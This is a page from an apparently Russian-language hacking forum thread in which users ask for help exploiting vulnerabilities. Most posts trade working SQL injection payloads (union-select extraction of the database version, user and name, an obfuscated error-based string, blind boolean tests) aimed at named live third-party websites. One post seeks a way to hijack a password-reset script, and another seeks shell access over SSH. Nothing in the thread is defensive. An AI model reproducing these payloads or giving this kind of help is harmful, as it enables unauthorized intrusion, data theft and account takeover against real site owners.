Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. n4yk

    n4yk New Member

    Joined:
    15 Sep 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Need help!

    Имеется уязвимость в скрипте восстановления пароля на почту:

    PHP:
    <?php
    $name
    =$_POST['name'];
    $email=$_POST['email'];
    $sql=mysql_query("select * from users_table where user='$name' and email='$email'");
    $col=mysql_num_rows($sql);
    if(
    $col=='0') { /* вывод ошибки что пользователь не найден */ } else {
    $password=rand_str();
    mysql_query("update users_table set pass='$password' where user='$name' and email='$email'");

    $sql=mysql_query("select * from users_table where user='$name'");
    $row=mysql_fetch_array($sql);
    $email_to_send=$row['email'];

    // --Дальше функция отправки нового пароля на email и вывод сообщения об успешной отправке--

    mail("$email_to_send","$message_with_new_pass","From: admin@site.ru");

    echo 
    'Message Sended';

    ?>

    При этом $password генерится автоматом, а $name и $email передаются в $_POST без фильтрации.

    Объеденение запросов через точку с запятой не проходят, а инъекция в селекте не подходит, т.к. она ничего не выводит.

    Пробовал в селект подставить union select 'new@email' as email, чтобы подменить почту, но мускул ругается на дублирование имен полей.

    Остается вариант сделать инъекцию в update, но ни в одной статье нет примеров инъекции в update после where.

    Есть мысли как можно реализовать либо подмену одного из полей в селекте, либо выполнить второй update?
     
    #23881 n4yk, 18 Feb 2015
    Last edited: 18 Feb 2015
  2. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,505
    Likes Received:
    398
    Reputations:
    228
    http://www.gfz-potsdam.de/forschung/ueberblick/departments/department-4/anorganische-und-isotopengeochemie/mitarbeiter/profil/judith-schicks/list/?cHash=dd9ae84d8ccec2384f97ec748975f738&no_cache=1&tx_mkgfzstaffdirectory_normalview%5Bsectionid%5D=18
    Кто подберёт колонки?
     
  3. UXOR

    UXOR Member

    Joined:
    16 Aug 2013
    Messages:
    44
    Likes Received:
    7
    Reputations:
    6
    крутите как слепую если нет вывода
     
  4. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    171
    Likes Received:
    30
    Reputations:
    1
    Есть IP там открыт 9999 порт , подключаюсь по нему к ссш ,в вожу логин и пароль который правильный на 100% ,консоль выдает следующие
    подскажите как можно подключиться к ссш чтобы выполнять команды?


    Пробывал по svn через различные клиента , не подключается
     
    #23884 swat_, 19 Feb 2015
    Last edited: 19 Feb 2015
  5. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    968
    Likes Received:
    119
    Reputations:
    25
    а что с 22 портом?
     
  6. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    171
    Likes Received:
    30
    Reputations:
    1
    закрыт
     
  7. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,505
    Likes Received:
    398
    Reputations:
    228
    http://www.aua.gr/probata/index.php?id=11))+/*+
    хелп
     
  8. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Сходу вывод не получил.
    Вслепую вектор будет следующим:
    4 версия mysql, смотрите на временную задержку
     
  9. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,505
    Likes Received:
    398
    Reputations:
    228
    Слепую то я раскрутил, нужен вывод...

    //блин, дак так и ставьте вопрос YaBtr
     
    #23889 DezMond™, 20 Feb 2015
    Last edited by a moderator: 20 Feb 2015
    1 person likes this.
  10. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,505
    Likes Received:
    398
    Reputations:
    228
    я думал, может кто колонки подберёт, тут 2 подзапроса
     
  11. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,369
    Likes Received:
    605
    Reputations:
    1,101
    Совместно с faza02 и YaBtr:

    Есть таблица images (одно из полей - image_id, второе - image). Доступна mysql.

    Error-based:
    Code:
    [I]id=1%20or%201%29%[/I][I]29%20gro[/I][I]up%20by[/I][I]%20c[/I][I]oncat%28vers[/I][I]ion%28%29,fl[/I][I]oor%28ra[/I][I]nd%280[/I][I]%29*2х[/I][I]%29%29%20[/I][I]having%20min%2[/I][I]80%29%2[/I][I]0or%201/*+[/I]
    
    Подзапросы не работают. Составить запрос для прямого вывода из таблицы пока не удалось.
     
    #23891 randman, 20 Feb 2015
    Last edited: 20 Feb 2015
    1 person likes this.
  12. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,505
    Likes Received:
    398
    Reputations:
    228
    Как правильно обратиться к таблице mysql ?
     
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    error-based вектора для вывода для версии mysql 4.0 не существует на данный момент. в данной ситуации только time-based. однако у этого пользователя file_priv n
     
    _________________________
  14. Simpliest

    Simpliest New Member

    Joined:
    29 Apr 2011
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    не пойму что за sql-inj такая тут

    http://il2.aviasibir.ru/mow/?page=squads&squad_id=4+and+1=1
    http://il2.aviasibir.ru/mow/?page=squads&squad_id=4

    вроде есть, а вроде и нет...
     
  15. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    мда, совсем не соображаю
     
    _________________________
    #23895 yarbabin, 21 Feb 2015
    Last edited: 21 Feb 2015
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,787
    Likes Received:
    808
    Reputations:
    856
    Как вам такой вариант, коллега ?

    _http://il2.aviasibir.ru/mow/?page=squads&squad_id=5-1+and+substr(@@version,1,1)=5 TRUE

    _http://il2.aviasibir.ru/mow/?page=squads&squad_id=5-1+and+substr(@@version,1,1)=4 FALSE
     
    _________________________
    #23896 BigBear, 21 Feb 2015
    Last edited: 21 Feb 2015
    2 people like this.
  17. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    256
    Likes Received:
    35
    Reputations:
    24
    Не могу добраться к БД:
    Code:
    http://ukrcrewing.com.ua/-agency%27%20union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21  --%20+
     
  18. EksTasy

    EksTasy Member

    Joined:
    26 Oct 2008
    Messages:
    99
    Likes Received:
    6
    Reputations:
    10
    есть ли здесь уязвимость?
     
  19. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    619
    Likes Received:
    148
    Reputations:
    94
    Code:
    ukrcrewing.com.ua/agency ('union select 1,concat(database(),0x3a,version(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--')
     
  20. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    256
    Likes Received:
    35
    Reputations:
    24
    Спасибо, но это тоже самое но в профиль -) Мне нужен именно список таблиц
     
Loading...
Thread Status:
Not open for further replies.